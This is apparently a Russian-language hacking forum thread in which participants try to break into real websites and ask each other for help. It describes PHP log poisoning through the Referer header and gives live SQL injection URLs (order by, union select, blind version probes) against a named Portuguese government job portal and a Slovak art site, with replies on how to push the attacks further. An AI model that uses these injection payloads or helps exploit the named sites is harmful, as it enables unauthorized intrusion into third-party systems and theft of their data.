Есть php-иньекция. пытаюсь записать в http-access.log строчку <?php 'phpinfo';?> через refererr Записалось успешно. Но ничего не отображает. Если открыть исходник страницы, вылезет та самая строчка. ОСь -freebsd 6.2 В чем проблема?
Таки да, читать файлы я могу. Там есть чат на файловой БД, внес туда строчку <?php echo 'hello'; ?>(для теста) - попробовал проинклудить - тот же результат. То ли система, то ли еще что-то на корню режет php строки.
Как верно подметил .Slip это скорее всего читалка файлов(то есть файлы не include а например fopen,file_get_contents и т.п. и выводяться в браузер), и ничего не режеться(ну и strip_tags там вот в добавок и теги не видешь с пхп).
Нашёл блинд инж, подобрал поля http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2-- http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2-- не пашет )':, видимо двойной запрос. http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(),1,1)=5-- +and+substring(version(),1,1)=4-- +and+substring(version(),1,1)=3-- так же результатов не дало. Помогите хотя бы определить версию. Подзапросы не работают у меня вообще! =(
http://fineart.sk/index.php?cat=-1+group+by+7-- сможет кто раскрутить? сам пробовал, не удалось даже версию узнать -/
А почему ты спрашиваешь?Посты набиваешь? http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2-- и http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+3-- и http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2 Догадайся почему. З.Ы. В mssql вроде нельзя отключить вывод об ошибках. Оракл? xD Соответственно блинд,разве нет?
Обнаружил при сниффере параметр на передачу он выглядит так примерно pay=%D0%9E%D1%82%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C Как каракули понять такие?
